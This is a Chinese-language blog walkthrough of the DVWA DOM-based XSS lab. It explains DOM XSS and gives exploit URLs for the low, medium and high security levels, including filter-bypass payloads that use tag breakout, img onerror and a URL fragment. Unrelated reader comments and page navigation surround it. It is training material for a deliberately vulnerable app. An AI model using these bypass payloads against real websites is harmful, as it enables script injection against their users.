DVWA XSS (DOM) 通关教程

DOM型XSS

DOM，全称Document Object Model，是一个平台和语言都中立的接口，可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS其实是一种特殊类型的反射型XSS，它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素，当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象，接着生成各个子文档对象，每个页面元素对应一个文档对象，每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说，客户端的脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。基于这个特性，就可以利用JS脚本来实现XSS漏洞的利用。

可能触发DOM型XSS的属性：

document.referer属性

window.name属性

location属性

innerHTML属性

documen.write属性

Low Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English<script>alert(/xss/);</script>

Medium Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English>/option></select><img src=1 onerror=alert(/xss/)>

High Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English #<script>alert(/xss/)</script>

feng

好的，很久没折腾啦，等有时间了再去折腾下黑苹果

发表在：Deepin Linux打造个性化的渗透攻防操作系统

phone number owner lookup

Pretty nice post. I just stumbled upon your weblog and wanted to say that I have truly loved surfing around your blog posts. After all I'll be subscribing in your rss feed and I hope you write again very soon!

发表在：Python脚本|根据URL生成特定目标网站备份文件猜测字典

小宸

我在安装burpsuite的时候更新了kali的软件的源还是无法找到程序，然后在freebuf找到burp V1.6的压缩包，成功解压安装，然后回来检查，应该是博主提供的软件源无法支持了

爱就爱啦

从百度点进来的,学习学习,呵呵!

徽山大雪停

博主能留个联系方式吗

DOM型XSS

Low Security Level

Exploit

Medium Security Level

Exploit

High Security Level

Exploit

标签：

分享到：

还没有评论，快来抢沙发！

【取消回复】

AnCoLin|影风

近期文章

标签云

最新评论

分类目录

文章排行

DVWA XSS (DOM) 通关教程

DOM型XSS

Low Security Level

Exploit

Medium Security Level

Exploit

High Security Level

Exploit

标签：

分享到：

相关文章

还没有评论，快来抢沙发！

【取消回复】

AnCoLin|影风

近期文章

标签云

最新评论

分类目录

文章排行